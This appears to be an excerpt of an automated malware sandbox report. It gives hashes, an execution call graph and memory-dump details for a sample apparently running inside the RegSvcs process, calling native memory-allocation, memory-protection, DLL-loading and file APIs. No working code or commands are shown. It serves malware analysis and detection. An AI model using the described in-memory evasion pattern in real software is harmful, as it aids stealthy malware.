                                          • Opcode Fuzzy Hash: fc0af425c2733dc27cbe2cf669f1189df6bef1bac68edffca32cc161de4fede8
                                          • Instruction Fuzzy Hash: ABC09B74D1F51F4AE70CDAA081761BEBB649F40711F11053E8617292D1DD2D3B40C6B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F91DF Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4662e2fa496d3e852d79e206caf0013e905ffa769b3ab3396abd00a1090119c8
                                          • Instruction ID: 0b63b02d33b0ba5da8b10311aadc84f17d9c75e152923f9a22fb512eef70f3d6
                                          • Opcode Fuzzy Hash: 4662e2fa496d3e852d79e206caf0013e905ffa769b3ab3396abd00a1090119c8
                                          • Instruction Fuzzy Hash: CAB01220D1D11FC2F71197D1D0B107D64145F80300F10043AC72F182D2CC1D224081B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:4.4%
                                          Dynamic/Decrypted Code Coverage:2.2%
                                          Signature Coverage:4.2%
                                          Total number of Nodes:667
                                          Total number of Limit Nodes:84
                                          execution_graph 34212 1339540 LdrInitializeThunk 34214 4014e9 34215 4014f0 NtProtectVirtualMemory 34214->34215 34217 401570 34215->34217 34221 422e47 34217->34221 34224 422e3c 34217->34224 34218 40157b 34227 41f567 34221->34227 34225 422e52 34224->34225 34226 41f567 24 API calls 34224->34226 34225->34218 34226->34225 34228 41f58d 34227->34228 34241 40b347 34228->34241 34230 41f599 34231 41f5f3 34230->34231 34249 40f587 34230->34249 34231->34218 34233 41f5ae 34234 41f5c1 34233->34234 34261 40f547 34233->34261 34237 41f5d6 34234->34237 34306 41e1f7 34234->34306 34266 40d177 34237->34266 34239 41f5e5 34240 41e1f7 2 API calls 34239->34240 34240->34231 34309 40b297 34241->34309 34243 40b354 34244 40b35b 34243->34244 34321 40b237 34243->34321 34244->34230 34250 40f5b3 34249->34250 34741 40c7f7 34250->34741 34252 40f5c5 34745 40f457 34252->34745 34255 40f5e0 34256 41dfd7 2 API calls 34255->34256 34258 40f5eb 34255->34258 34256->34258 34257 40f5f8 34259 41dfd7 2 API calls 34257->34259 34260 40f609 34257->34260 34258->34233 34259->34260 34260->34233 34262 418a97 LdrLoadDll 34261->34262 34263 40f566 34262->34263 34264 40f56d 34263->34264 34265 40f56f GetUserGeoID 34263->34265 34264->34234 34265->34234 34267 40d18f 34266->34267 34268 40c7f7 LdrLoadDll 34267->34268 34269 40d1f3 34268->34269 34764 40c477 34269->34764 34271 40d46a 34271->34239 34272 40d219 34272->34271 34773 417fb7 34272->34773 34274 40d25e 34274->34271 34776 409547 34274->34776 34276 40d2a2 34276->34271 34798 41e047 34276->34798 34280 40d2f8 34281 40d2ff 34280->34281 34810 41db57 34280->34810 34283 41fa57 2 API calls 34281->34283 34285 40d30c 34283->34285 34285->34239 34286 40d359 34815 41f997 34286->34815 34287 40d349 34288 41fa57 2 API calls 34287->34288 34290 40d350 34288->34290 34290->34239 34291 40d372 34292 41f997 2 API calls 34291->34292 34293 40d3a8 34292->34293 34294 40f617 3 API calls 34293->34294 34295 40d3cd 34294->34295 34295->34281 34296 40d3d8 34295->34296 34297 41fa57 2 API calls 34296->34297 34298 40d3fc 34297->34298 34820 41dba7 34298->34820 34301 41db57 2 API calls 34302 40d437 34301->34302 34302->34271 34825 41d967 34302->34825 34305 41e1f7 2 API calls 34305->34271 34307 41e216 ExitProcess 34306->34307 34308 41eb17 LdrLoadDll 34306->34308 34308->34307 34340 41c707 34309->34340 34313 40b2bd 34313->34243 34314 40b2b3 34314->34313 34347 41eec7 34314->34347 34316 40b2fa 34316->34313 34358 40b0d7 34316->34358 34318 40b31a 34364 40ab47 LdrLoadDll 34318->34364 34320 40b32c 34320->34243 34322 40b251 34321->34322 34323 41f1b7 LdrLoadDll 34321->34323 34715 41f1b7 34322->34715 34323->34322 34326 41f1b7 LdrLoadDll 34327 40b278 34326->34327 34328 40f347 34327->34328 34329 40f360 34328->34329 34724 40c677 34329->34724 34331 40f373 34728 41dd27 34331->34728 34335 40f399 34338 40f3c4 34335->34338 34734 41dda7 34335->34734 34337 41dfd7 2 API calls 34339 40b36c 34337->34339 34338->34337 34339->34230 34341 41c716 34340->34341 34365 418a97 34341->34365 34343 40b2aa 34344 41c5b7 34343->34344 34371 41e147 34344->34371 34348 41eee0 34347->34348 34378 418687 34348->34378 34350 41eef8 34351 41ef01 34350->34351 34417 41ed07 34350->34417 34351->34316 34353 41ef15 34353->34351 34434 41da47 34353->34434 34693 408937 34358->34693 34360 40b0f8 34360->34318 34361 40b0f1 34361->34360 34706 408bf7 34361->34706 34364->34320 34366 418aa5 34365->34366 34367 418ab1 34365->34367 34366->34367 34370 418f17 LdrLoadDll 34366->34370 34367->34343 34369 418c03 34369->34343 34370->34369 34374 41eb17 34371->34374 34373 41c5cc 34373->34314 34375 41eb9c 34374->34375 34377 41eb26 34374->34377 34375->34373 34376 418a97 LdrLoadDll 34376->34375 34377->34375 34377->34376 34379 4189ca 34378->34379 34380 41869b 34378->34380 34379->34350 34380->34379 34442 41d797 34380->34442 34383 4187cc 34445 41dea7 34383->34445 34384 4187af 34502 41dfa7 LdrLoadDll 34384->34502 34387 4187b9 34387->34350 34388 4187f3 34389 41fa57 2 API calls 34388->34389 34393 4187ff 34389->34393 34390 41898e 34391 41dfd7 2 API calls 34390->34391 34394 418995 34391->34394 34392 4189a4 34511 4183a7 LdrLoadDll NtReadFile NtClose 34392->34511 34393->34387 34393->34390 34393->34392 34397 418897 34393->34397 34394->34350 34396 4189b7 34396->34350 34398 4188fe 34397->34398 34400 4188a6 34397->34400 34398->34390 34399 418911 34398->34399 34504 41de27 34399->34504 34402 4188ab 34400->34402 34403 4188bf 34400->34403 34503 418267 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34402->34503 34406 4188c4 34403->34406 34407 4188dc 34403->34407 34448 418307 34406->34448 34407->34394 34460 418027 34407->34460 34410 4188b5 34410->34350 34411 4188d2 34411->34350 34413 418971 34508 41dfd7 34413->34508 34414 4188f4 34414->34350 34416 41897d 34416->34350 34419 41ed22 34417->34419 34418 41ed34 34418->34353 34419->34418 34529 41f9d7 34419->34529 34421 41ed54 34532 417c77 34421->34532 34423 41ed77 34423->34418 34424 417c77 3 API calls 34423->34424 34427 41ed99 34424->34427 34426 41ee21 34428 41ee31 34426->34428 34659 41ea97 LdrLoadDll 34426->34659 34427->34418 34564 418fd7 34427->34564 34575 41e907 34428->34575 34431 41ee5f 34654 41da07 34431->34654 34435 41eb17 LdrLoadDll 34434->34435 34436 41da63 34435->34436 34687 133967a 34436->34687 34437 41da7e 34439 41fa57 34437->34439 34440 41ef70 34439->34440 34690 41e1b7 34439->34690 34440->34316 34443 41eb17 LdrLoadDll 34442->34443 34444 418780 34443->34444 34444->34383 34444->34384 34444->34387 34446 41dec3 NtCreateFile 34445->34446 34447 41eb17 LdrLoadDll 34445->34447 34446->34388 34447->34446 34449 418323 34448->34449 34450 41de27 LdrLoadDll 34449->34450 34451 418344 34450->34451 34452 41834b 34451->34452 34453 41835f 34451->34453 34454 41dfd7 2 API calls 34452->34454 34455 41dfd7 2 API calls 34453->34455 34456 418354 34454->34456 34457 418368 34455->34457 34456->34411 34512 41fb77 LdrLoadDll RtlAllocateHeap 34457->34512 34459 418373 34459->34411 34461 418072 34460->34461 34462 4180a5 34460->34462 34464 41de27 LdrLoadDll 34461->34464 34463 4181f0 34462->34463 34467 4180c1 34462->34467 34465 41de27 LdrLoadDll 34463->34465 34466 41808d 34464->34466 34472 41820b 34465->34472 34468 41dfd7 2 API calls 34466->34468 34469 41de27 LdrLoadDll 34467->34469 34470 418096 34468->34470 34471 4180dc 34469->34471 34470->34414 34474 4180e3 34471->34474 34475 4180f8 34471->34475 34525 41de67 LdrLoadDll 34472->34525 34477 41dfd7 2 API calls 34474->34477 34478 418113 34475->34478 34479 4180fd 34475->34479 34476 418245 34480 41dfd7 2 API calls 34476->34480 34481 4180ec 34477->34481 34485 418118 34478->34485 34513 41fb37 34478->34513 34482 41dfd7 2 API calls 34479->34482 34483 418250 34480->34483 34481->34414 34484 418106 34482->34484 34483->34414 34484->34414 34489 41812a 34485->34489 34516 41df57 34485->34516 34488 41817e 34490 418195 34488->34490 34524 41dde7 LdrLoadDll 34488->34524 34489->34414 34492 4181b1 34490->34492 34493 41819c 34490->34493 34494 41dfd7 2 API calls 34492->34494 34495 41dfd7 2 API calls 34493->34495 34496 4181ba 34494->34496 34495->34489 34497 4181e6 34496->34497 34519 41f857 34496->34519 34497->34414 34499 4181d1 34500 41fa57 2 API calls 34499->34500 34501 4181da 34500->34501 34501->34414 34502->34387 34503->34410 34505 418959 34504->34505 34506 41eb17 LdrLoadDll 34504->34506 34507 41de67 LdrLoadDll 34505->34507 34506->34505 34507->34413 34509 41dff3 NtClose 34508->34509 34510 41eb17 LdrLoadDll 34508->34510 34509->34416 34510->34509 34511->34396 34512->34459 34526 41e177 34513->34526 34515 41fb4f 34515->34485 34517 41eb17 LdrLoadDll 34516->34517 34518 41df73 NtReadFile 34517->34518 34518->34488 34520 41f864 34519->34520 34521 41f87b 34519->34521 34520->34521 34522 41fb37 2 API calls 34520->34522 34521->34499 34523 41f892 34522->34523 34523->34499 34524->34490 34525->34476 34527 41eb17 LdrLoadDll 34526->34527 34528 41e193 RtlAllocateHeap 34527->34528 34528->34515 34531 41fa04 34529->34531 34660 41e087 34529->34660 34531->34421 34533 417c88 34532->34533 34534 417c90 34532->34534 34533->34423 34535 417f63 34534->34535 34663 420b17 34534->34663 34535->34423 34537 417ce4 34538 420b17 2 API calls 34537->34538 34541 417cef 34538->34541 34539 417d3d 34542 420b17 2 API calls 34539->34542 34541->34539 34543 420c47 3 API calls 34541->34543 34674 420bb7 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34541->34674 34545 417d51 34542->34545 34543->34541 34544 417dae 34546 420b17 2 API calls 34544->34546 34545->34544 34668 420c47 34545->34668 34547 417dc4 34546->34547 34549 417e01 34547->34549 34551 420c47 3 API calls 34547->34551 34550 420b17 2 API calls 34549->34550 34552 417e0c 34550->34552 34551->34547 34553 420c47 3 API calls 34552->34553 34560 417e46 34552->34560 34553->34552 34555 417f3b 34676 420b77 LdrLoadDll RtlFreeHeap 34555->34676 34557 417f45 34677 420b77 LdrLoadDll RtlFreeHeap 34557->34677 34559 417f4f 34678 420b77 LdrLoadDll RtlFreeHeap 34559->34678 34675 420b77 LdrLoadDll RtlFreeHeap 34560->34675 34562 417f59 34679 420b77 LdrLoadDll RtlFreeHeap 34562->34679 34565 418fe8 34564->34565 34566 418687 8 API calls 34565->34566 34570 418ffe 34566->34570 34567 419007 34567->34426 34568 41903e 34569 41fa57 2 API calls 34568->34569 34571 41904f 34569->34571 34570->34567 34570->34568 34572 41908a 34570->34572 34571->34426 34573 41fa57 2 API calls 34572->34573 34574 41908f 34573->34574 34574->34426 34680 41e797 34575->34680 34577 41e91b 34578 41e797 LdrLoadDll 34577->34578 34579 41e924 34578->34579 34580 41e797 LdrLoadDll 34579->34580 34581 41e92d 34580->34581 34582 41e797 LdrLoadDll 34581->34582 34583 41e936 34582->34583 34584 41e797 LdrLoadDll 34583->34584 34585 41e93f 34584->34585 34586 41e797 LdrLoadDll 34585->34586 34587 41e948 34586->34587 34588 41e797 LdrLoadDll 34587->34588 34589 41e954 34588->34589 34590 41e797 LdrLoadDll 34589->34590 34591 41e95d 34590->34591 34592 41e797 LdrLoadDll 34591->34592 34593 41e966 34592->34593 34594 41e797 LdrLoadDll 34593->34594 34595 41e96f 34594->34595 34596 41e797 LdrLoadDll 34595->34596 34597 41e978 34596->34597 34598 41e797 LdrLoadDll 34597->34598 34599 41e981 34598->34599 34600 41e797 LdrLoadDll 34599->34600 34601 41e98d 34600->34601 34602 41e797 LdrLoadDll 34601->34602 34603 41e996 34602->34603 34604 41e797 LdrLoadDll 34603->34604 34605 41e99f 34604->34605 34606 41e797 LdrLoadDll 34605->34606 34607 41e9a8 34606->34607 34608 41e797 LdrLoadDll 34607->34608 34609 41e9b1 34608->34609 34610 41e797 LdrLoadDll 34609->34610 34611 41e9ba 34610->34611 34612 41e797 LdrLoadDll 34611->34612 34613 41e9c6 34612->34613 34614 41e797 LdrLoadDll 34613->34614 34615 41e9cf 34614->34615 34616 41e797 LdrLoadDll 34615->34616 34617 41e9d8 34616->34617 34618 41e797 LdrLoadDll 34617->34618 34619 41e9e1 34618->34619 34620 41e797 LdrLoadDll 34619->34620 34621 41e9ea 34620->34621 34622 41e797 LdrLoadDll 34621->34622 34623 41e9f3 34622->34623 34624 41e797 LdrLoadDll 34623->34624 34625 41e9ff 34624->34625 34626 41e797 LdrLoadDll 34625->34626 34627 41ea08 34626->34627 34628 41e797 LdrLoadDll 34627->34628 34629 41ea11 34628->34629 34630 41e797 LdrLoadDll 34629->34630 34631 41ea1a 34630->34631 34632 41e797 LdrLoadDll 34631->34632 34633 41ea23 34632->34633 34634 41e797 LdrLoadDll 34633->34634 34635 41ea2c 34634->34635 34636 41e797 LdrLoadDll 34635->34636 34637 41ea38 34636->34637 34638 41e797 LdrLoadDll 34637->34638 34639 41ea41 34638->34639 34640 41e797 LdrLoadDll 34639->34640 34641 41ea4a 34640->34641 34642 41e797 LdrLoadDll 34641->34642 34643 41ea53 34642->34643 34644 41e797 LdrLoadDll 34643->34644 34645 41ea5c 34644->34645 34646 41e797 LdrLoadDll 34645->34646 34647 41ea65 34646->34647 34648 41e797 LdrLoadDll 34647->34648 34649 41ea71 34648->34649 34650 41e797 LdrLoadDll 34649->34650 34651 41ea7a 34650->34651 34652 41e797 LdrLoadDll 34651->34652 34653 41ea83 34652->34653 34653->34431 34655 41eb17 LdrLoadDll 34654->34655 34656 41da23 34655->34656 34686 1339860 LdrInitializeThunk 34656->34686 34657 41da3a 34657->34353 34659->34428 34661 41e0a3 NtAllocateVirtualMemory 34660->34661 34662 41eb17 LdrLoadDll 34660->34662 34661->34531 34662->34661 34664 420b27 34663->34664 34665 420b2d 34663->34665 34664->34537 34666 41fb37 2 API calls 34665->34666 34667 420b53 34666->34667 34667->34537 34669 420bb7 34668->34669 34670 41fb37 2 API calls 34669->34670 34671 420c14 34669->34671 34672 420bf1 34670->34672 34671->34545 34673 41fa57 2 API calls 34672->34673 34673->34671 34674->34541 34675->34555 34676->34557 34677->34559 34678->34562 34679->34535 34681 41e7b2 34680->34681 34682 418a97 LdrLoadDll 34681->34682 34683 41e7d2 34682->34683 34684 418a97 LdrLoadDll 34683->34684 34685 41e886 34683->34685 34684->34685 34685->34577 34686->34657 34688 1339681 34687->34688 34689 133968f LdrInitializeThunk 34687->34689 34688->34437 34689->34437 34691 41e1d3 RtlFreeHeap 34690->34691 34692 41eb17 LdrLoadDll 34690->34692 34691->34440 34692->34691 34694 408942 34693->34694 34695 408947 34693->34695 34694->34361 34696 41f9d7 2 API calls 34695->34696 34699 40896c 34696->34699 34697 4089cf 34697->34361 34698 41da07 2 API calls 34698->34699 34699->34697 34699->34698 34700 4089d5 34699->34700 34704 41f9d7 2 API calls 34699->34704 34709 41e107 34699->34709 34702 4089fb 34700->34702 34703 41e107 2 API calls 34700->34703 34702->34361 34705 4089ec 34703->34705 34704->34699 34705->34361 34707 41e107 2 API calls 34706->34707 34708 408c15 34707->34708 34708->34318 34710 41eb17 LdrLoadDll 34709->34710 34711 41e123 34710->34711 34714 13396e0 LdrInitializeThunk 34711->34714 34712 41e13a 34712->34699 34714->34712 34716 41f1da 34715->34716 34719 40c327 34716->34719 34718 40b262 34718->34326 34721 40c34b 34719->34721 34720 40c352 34720->34718 34721->34720 34722 40c387 LdrLoadDll 34721->34722 34723 40c39e 34721->34723 34722->34723 34723->34718 34725 40c69a 34724->34725 34727 40c717 34725->34727 34739 41d7d7 LdrLoadDll 34725->34739 34727->34331 34729 41eb17 LdrLoadDll 34728->34729 34730 40f382 34729->34730 34730->34339 34731 41e317 34730->34731 34732 41e336 LookupPrivilegeValueW 34731->34732 34733 41eb17 LdrLoadDll 34731->34733 34732->34335 34733->34732 34735 41eb17 LdrLoadDll 34734->34735 34736 41ddc3 34735->34736 34740 1339910 LdrInitializeThunk 34736->34740 34737 41dde2 34737->34338 34739->34727 34740->34737 34742 40c81e 34741->34742 34743 40c677 LdrLoadDll 34742->34743 34744 40c881 34743->34744 34744->34252 34746 40f471 34745->34746 34754 40f527 34745->34754 34747 40c677 LdrLoadDll 34746->34747 34748 40f493 34747->34748 34755 41da87 34748->34755 34750 40f4d5 34758 41dac7 34750->34758 34753 41dfd7 2 API calls 34753->34754 34754->34255 34754->34257 34756 41eb17 LdrLoadDll 34755->34756 34757 41daa3 34756->34757 34757->34750 34759 41eb17 LdrLoadDll 34758->34759 34760 41dae3 34759->34760 34763 1339fe0 LdrInitializeThunk 34760->34763 34761 40f51b 34761->34753 34763->34761 34765 40c484 34764->34765 34766 40c488 34764->34766 34765->34272 34767 40c4a1 34766->34767 34768 40c4d3 34766->34768 34830 41d817 LdrLoadDll 34767->34830 34831 41d817 LdrLoadDll 34768->34831 34770 40c4e4 34770->34272 34772 40c4c3 34772->34272 34774 40f617 3 API calls 34773->34774 34775 417fdd 34773->34775 34774->34775 34775->34274 34832 409777 34776->34832 34778 40976d 34778->34276 34779 409565 34779->34778 34780 409643 34779->34780 34781 408937 4 API calls 34779->34781 34780->34778 34782 408937 4 API calls 34780->34782 34797 409723 34780->34797 34785 4095a3 34781->34785 34786 409680 34782->34786 34784 409737 34784->34778 34880 40f887 10 API calls 34784->34880 34785->34780 34792 409639 34785->34792 34846 409227 34785->34846 34793 409227 17 API calls 34786->34793 34795 409719 34786->34795 34786->34797 34788 40974d 34788->34778 34881 40f887 10 API calls 34788->34881 34790 409763 34790->34276 34794 408bf7 2 API calls 34792->34794 34793->34786 34794->34780 34796 408bf7 2 API calls 34795->34796 34796->34797 34797->34778 34879 40f887 10 API calls 34797->34879 34799 41eb17 LdrLoadDll 34798->34799 34800 41e063 34799->34800 35018 13398f0 LdrInitializeThunk 34800->35018 34801 40d2d9 34803 40f617 34801->34803 34804 40f634 34803->34804 35019 41db07 34804->35019 34807 40f67c 34807->34280 34808 41db57 2 API calls 34809 40f6a5 34808->34809 34809->34280 34811 41db73 34810->34811 34812 41eb17 LdrLoadDll 34810->34812 35025 1339780 LdrInitializeThunk 34811->35025 34812->34811 34813 40d33c 34813->34286 34813->34287 34817 41f9a1 34815->34817 34816 41e087 2 API calls 34819 41fa04 34816->34819 34817->34291 34817->34816 34818 41f9c3 34817->34818 34818->34291 34819->34291 34821 41eb17 LdrLoadDll 34820->34821 34822 41dbc3 34821->34822 35026 13397a0 LdrInitializeThunk 34822->35026 34823 40d410 34823->34301 34826 41eb17 LdrLoadDll 34825->34826 34827 41d983 34826->34827 35027 1339a20 LdrInitializeThunk 34827->35027 34828 40d463 34828->34305 34830->34772 34831->34770 34833 40979e 34832->34833 34834 408937 4 API calls 34833->34834 34841 4099f3 34833->34841 34835 4097f1 34834->34835 34836 408bf7 2 API calls 34835->34836 34835->34841 34837 409880 34836->34837 34838 408937 4 API calls 34837->34838 34837->34841 34839 409895 34838->34839 34840 408bf7 2 API calls 34839->34840 34839->34841 34843 4098f5 34840->34843 34841->34779 34842 408937 4 API calls 34842->34843 34843->34841 34843->34842 34844 409227 17 API calls 34843->34844 34845 408bf7 2 API calls 34843->34845 34844->34843 34845->34843 34847 40924c 34846->34847 34882 41d857 34847->34882 34850 4092a0 34850->34785 34851 409321 34917 40f767 LdrLoadDll NtClose 34851->34917 34852 41da47 2 API calls 34853 4092c4 34852->34853 34853->34851 34854 4092cf 34853->34854 34856 40934d 34854->34856 34885 40d477 34854->34885 34856->34785 34857 40933c 34858 409343 34857->34858 34859 409359 34857->34859 34861 41dfd7 2 API calls 34858->34861 34918 41d8d7 LdrLoadDll 34859->34918 34861->34856 34862 4092e9 34862->34856 34905 409057 34862->34905 34864 409384 34866 40d477 5 API calls 34864->34866 34868 4093a4 34866->34868 34868->34856 34919 41d907 LdrLoadDll 34868->34919 34870 4093c9 34920 41d997 LdrLoadDll 34870->34920 34872 4093e3 34873 41d967 2 API calls 34872->34873 34874 4093f2 34873->34874 34875 41dfd7 2 API calls 34874->34875 34876 4093fc 34875->34876 34921 408e27 34876->34921 34878 409410 34878->34785 34879->34784 34880->34788 34881->34790 34883 409296 34882->34883 34884 41eb17 LdrLoadDll 34882->34884 34883->34850 34883->34851 34883->34852 34884->34883 34886 40d4a2 34885->34886 34887 40f617 3 API calls 34886->34887 34888 40d501 34887->34888 34889 40d54a 34888->34889 34890 41db57 2 API calls 34888->34890 34889->34862 34891 40d52c 34890->34891 34892 40d533 34891->34892 34895 40d556 34891->34895 34893 41dba7 2 API calls 34892->34893 34894 40d540 34893->34894 34896 41dfd7 2 API calls 34894->34896 34897 40d5c0 34895->34897 34898 40d5a0 34895->34898 34896->34889 34900 41dba7 2 API calls 34897->34900 34899 41dfd7 2 API calls 34898->34899 34901 40d5ad 34899->34901 34902 40d5d2 34900->34902 34901->34862 34903 41dfd7 2 API calls 34902->34903 34904 40d5dc 34903->34904 34904->34862 34906 40906d 34905->34906 34937 41d377 34906->34937 34908 4091f8 34908->34785 34909 409086 34909->34908 34958 408c37 34909->34958 34911 40916c 34911->34908 34912 408e27 11 API calls 34911->34912 34913 40919a 34912->34913 34913->34908 34914 41da47 2 API calls 34913->34914 34915 4091cf 34914->34915 34915->34908 34916 41e047 2 API calls 34915->34916 34916->34908 34917->34857 34918->34864 34919->34870 34920->34872 34922 408e50 34921->34922 34997 408d97 34922->34997 34925 41e047 2 API calls 34926 408e63 34925->34926 34926->34925 34927 408eee 34926->34927 34928 408ee9 34926->34928 35005 40f7e7 34926->35005 34927->34878 34929 41dfd7 2 API calls 34928->34929 34930 408f21 34929->34930 34930->34927 34931 41d857 LdrLoadDll 34930->34931 34932 408f86 34931->34932 34932->34927 35009 41d897 34932->35009 34934 408fea 34934->34927 34935 418687 8 API calls 34934->34935 34936 40903f 34935->34936 34936->34878 34938 41fb37 2 API calls 34937->34938 34939 41d38e 34938->34939 34965 40a987 34939->34965 34941 41d3a9 34942 41d3ca 34941->34942 34943 41d3de 34941->34943 34944 41fa57 2 API calls 34942->34944 34946 41f9d7 2 API calls 34943->34946 34945 41d3d4 34944->34945 34945->34909 34947 41d445 34946->34947 34948 41f9d7 2 API calls 34947->34948 34957 41d45e 34948->34957 34951 41d715 34952 41fa57 2 API calls 34951->34952 34953 41d71f 34952->34953 34953->34909 34954 41d729 34955 41fa57 2 API calls 34954->34955 34956 41d77e 34955->34956 34956->34909 34957->34954 34971 41fa17 34957->34971 34959 408d36 34958->34959 34960 408c4c 34958->34960 34959->34911 34960->34959 34961 418687 8 API calls 34960->34961 34962 408cb9 34961->34962 34963 41fa57 2 API calls 34962->34963 34964 408ce0 34962->34964 34963->34964 34964->34911 34966 40a9ac 34965->34966 34967 40c327 LdrLoadDll 34966->34967 34968 40a9df 34967->34968 34970 40aa04 34968->34970 34974 40dea7 34968->34974 34970->34941 34991 41e0c7 34971->34991 34975 40ded3 34974->34975 34976 41dd27 LdrLoadDll 34975->34976 34977 40deec 34976->34977 34978 40def3 34977->34978 34985 41dd67 34977->34985 34978->34970 34982 40df2e 34983 41dfd7 2 API calls 34982->34983 34984 40df51 34983->34984 34984->34970 34986 41eb17 LdrLoadDll 34985->34986 34987 41dd83 34986->34987 34989 1339710 LdrInitializeThunk 34987->34989 34988 40df16 34988->34978 34990 41e357 LdrLoadDll 34988->34990 34989->34988 34990->34982 34992 41eb17 LdrLoadDll 34991->34992 34993 41e0e3 34992->34993 34996 1339a00 LdrInitializeThunk 34993->34996 34994 41d70e 34994->34951 34994->34954 34996->34994 34998 408daf 34997->34998 34999 40c327 LdrLoadDll 34998->34999 35000 408dca 34999->35000 35001 418a97 LdrLoadDll 35000->35001 35002 408dda 35001->35002 35003 408de3 PostThreadMessageW 35002->35003 35004 408df7 35002->35004 35003->35004 35004->34926 35006 40f7fa 35005->35006 35012 41d9d7 35006->35012 35010 41eb17 LdrLoadDll 35009->35010 35011 41d8b3 35010->35011 35011->34934 35013 41d9f3 35012->35013 35014 41eb17 LdrLoadDll 35012->35014 35017 1339840 LdrInitializeThunk 35013->35017 35014->35013 35015 40f825 35015->34926 35017->35015 35018->34801 35020 41db23 35019->35020 35021 41eb17 LdrLoadDll 35019->35021 35024 13399a0 LdrInitializeThunk 35020->35024 35021->35020 35022 40f675 35022->34807 35022->34808 35024->35022 35025->34813 35026->34823 35027->34828

                                          Executed Functions

                                          Function 004012A4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID: 8Gx2$s}]
                                          • API String ID: 2706961497-945437964
                                          • Opcode ID: 5bb49a8eef3be3edd932109a5e3adeb38c6f9bfda43da5c4f592a477622c970e
                                          • Instruction ID: c0b0455e42076189d83d4af9986f3c51775b971acdbe136d0495b293f72d024c
                                          • Opcode Fuzzy Hash: 5bb49a8eef3be3edd932109a5e3adeb38c6f9bfda43da5c4f592a477622c970e
                                          • Instruction Fuzzy Hash: 28814671C2075C9ADF10CFE4CC41AEEBBB4BF99304F20426EE504BA251EBB416898B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E083 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 28 41e083-41e0c4 call 41eb17 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: HD@
                                          • API String ID: 2167126740-1661062907
                                          • Opcode ID: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction ID: f444772827566111b6b78d4de23a24a9c190825f352371e7213e3277b505b669
                                          • Opcode Fuzzy Hash: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction Fuzzy Hash: 1CF08CB5200158AFCB14CFA9DC81EEB3BADAF8D354F008148FE4997242C630E810CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E087 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 31 41e087-41e09d 32 41e0a3-41e0c4 NtAllocateVirtualMemory 31->32 33 41e09e call 41eb17 31->33 33->32
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: HD@
                                          • API String ID: 2167126740-1661062907
                                          • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction ID: f463faf2946c0d4d74eccb42d7aa3306e3984d4a8e1b0def0a1c2f8da30aeccc
                                          • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction Fuzzy Hash: B0F015B6200218ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C630F810CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 267 4014e9 268 4014f0-4014ff 267->268 269 401501-401504 268->269 270 401512-401519 268->270 269->270 271 401506-40150a 269->271 270->268 272 40151b 270->272 271->270 273 40150c-401510 271->273 274 40151e-401573 NtProtectVirtualMemory call 4016b0 272->274 273->270 275 401586-40158c 273->275 279 401579 call 422e47 274->279 280 401579 call 422e3c 274->280 275->274 278 40157b-401585 279->278 280->278
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                          Memory Dump Source
